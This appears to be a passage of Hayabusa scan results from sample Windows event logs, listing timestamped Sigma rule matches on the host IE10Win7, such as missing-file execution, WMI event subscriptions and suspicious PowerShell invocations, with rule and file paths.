9092016-08-19 11:07:47.443 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9102016-08-19 11:19:46.459 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9112016-08-19 11:19:46.459 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9122016-08-19 22:57:54.520 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9132016-08-19 22:57:54.520 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9142016-08-19 23:00:17.112 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9152016-08-20 05:09:55.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9162016-08-20 05:09:55.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9172016-08-20 05:09:57.843 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9182016-08-20 05:09:57.843 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9192016-08-20 05:47:29.854 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9202016-08-20 05:47:29.854 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9212016-08-20 06:47:30.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9222016-08-20 06:47:30.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9232016-08-20 08:02:19.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9242016-08-20 08:02:19.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9252016-08-20 08:02:22.296 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9262016-08-20 08:02:22.296 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9272016-08-21 01:03:05.348 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9282016-08-21 01:03:05.348 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9292016-08-21 05:05:57.517 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9302016-08-21 05:05:57.517 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9312016-08-21 05:05:59.973 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9322016-08-21 05:05:59.973 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9332016-08-22 06:00:11.001 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9342016-08-22 06:00:11.001 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9352016-08-22 06:03:27.106 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9362016-08-22 06:03:27.106 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9372016-08-22 06:42:09.518 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9382016-08-22 06:42:09.518 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9392016-08-22 06:45:28.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9402016-08-22 06:47:30.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9412016-08-22 06:47:30.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9422016-08-22 06:49:00.074 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9432016-08-23 09:12:59.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9442016-08-23 09:12:59.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9452016-08-23 09:13:02.546 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9462016-08-23 09:13:02.546 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9472016-08-23 11:24:05.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9482016-08-23 11:24:05.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9492016-08-25 06:17:07.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9502016-08-25 06:17:07.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9512016-08-25 06:17:10.203 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9522016-08-25 06:17:10.203 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9532016-08-25 06:25:05.171 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9542016-08-25 06:25:05.171 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9552016-08-25 06:25:59.734 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9562016-08-25 06:25:59.734 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9572016-08-25 06:26:37.046 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9582016-08-25 06:26:37.046 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9592016-08-25 06:27:31.828 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9602016-08-25 06:27:31.828 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9612016-08-25 06:28:38.656 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9622016-08-25 06:30:06.203 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9632016-08-25 06:30:06.203 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9642016-08-25 06:38:23.076 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9652016-08-25 06:38:23.076 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9662016-08-25 06:51:10.232 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9672016-08-25 06:51:10.232 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9682016-08-25 06:51:19.681 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9692016-08-25 06:51:19.681 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9702016-08-26 00:03:05.603 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9712016-08-26 00:03:05.603 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9722016-08-26 00:04:55.947 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9732016-08-26 00:04:55.947 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9742016-08-26 05:43:45.515 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9752016-08-26 05:43:45.515 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9762016-08-26 05:43:48.140 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9772016-08-26 05:43:48.140 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9782016-08-26 05:58:46.881 +09:00IE10Win74688highSuspicious PowerShell Invocations - Genericrules/sigma/deprecated/powershell_suspicious_invocation_generic.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9792016-08-27 05:34:49.928 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9802016-08-27 05:34:49.928 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9812016-08-27 05:36:53.970 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9822016-08-27 09:43:11.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9832016-08-27 09:43:11.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9842016-08-28 00:20:56.556 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9852016-08-28 00:20:56.556 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9862016-08-28 00:31:15.759 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9872016-08-28 00:31:15.759 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9882016-08-28 00:32:08.574 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9892016-08-28 00:32:08.574 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9902016-08-28 00:32:35.199 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9912016-08-28 00:32:35.199 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9922016-08-28 00:34:22.339 +09:00IE10Win74688highSuspicious PowerShell Invocations - Specificrules/sigma/deprecated/powershell_suspicious_invocation_specific.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9932016-08-28 00:34:22.339 +09:00IE10Win74688highRelevant Anti-Virus Eventrules/sigma/builtin/application/win_av_relevant_match.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9942016-08-28 06:44:54.195 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9952016-08-28 06:44:54.195 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9962016-08-28 13:15:03.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9972016-08-28 13:15:03.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9982016-08-29 23:37:30.711 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9992016-08-29 23:37:30.711 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10002016-08-29 23:37:47.253 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10012016-08-29 23:37:47.253 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10022016-08-30 00:26:09.514 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10032016-08-30 00:26:09.514 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10042016-08-30 00:26:12.129 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10052016-08-30 00:26:12.129 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10062016-08-30 03:52:06.519 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10072016-08-30 03:52:06.519 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10082016-08-30 03:52:09.234 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10092016-08-30 03:52:09.234 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10102016-08-30 18:48:20.558 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10112016-08-30 18:48:20.558 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10122016-08-30 18:53:55.378 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10132016-08-30 23:01:04.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10142016-08-30 23:01:04.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10152016-08-31 06:03:24.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10162016-08-31 06:03:24.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10172016-08-31 09:11:14.985 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10182016-08-31 09:11:14.985 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10192016-09-02 00:54:06.355 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10202016-09-02 00:54:06.355 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10212016-09-02 23:08:32.910 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10222016-09-02 23:08:32.910 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10232016-09-02 23:10:46.008 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10242016-09-03 23:42:26.373 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10252016-09-03 23:42:26.373 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10262016-09-03 23:45:14.660 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10272016-09-03 23:45:14.661 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10282016-09-03 23:45:14.661 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10292016-09-03 23:45:42.333 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10302016-09-03 23:46:17.504 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10312016-09-03 23:46:53.627 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10322016-09-03 23:47:29.168 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10332016-09-03 23:48:26.011 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10342016-09-03 23:48:49.187 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10352016-09-03 23:49:58.603 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10362016-09-03 23:51:06.219 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10372016-09-03 23:51:13.833 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10382016-09-03 23:51:25.086 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10392016-09-03 23:51:39.538 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10402016-09-03 23:52:37.050 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10412016-09-03 23:53:24.700 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10422016-09-03 23:53:57.790 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10432016-09-04 06:19:15.500 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10442016-09-04 06:19:15.500 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10452016-09-04 06:35:14.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10462016-09-04 06:35:15.664 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10472016-09-04 06:35:15.664 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10482016-09-04 06:37:55.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10492016-09-04 06:37:55.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10502016-09-04 22:32:03.952 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10512016-09-04 22:32:03.952 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10522016-09-04 22:32:29.279 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10532016-09-04 22:32:29.279 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10542016-09-15 11:13:19.927 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
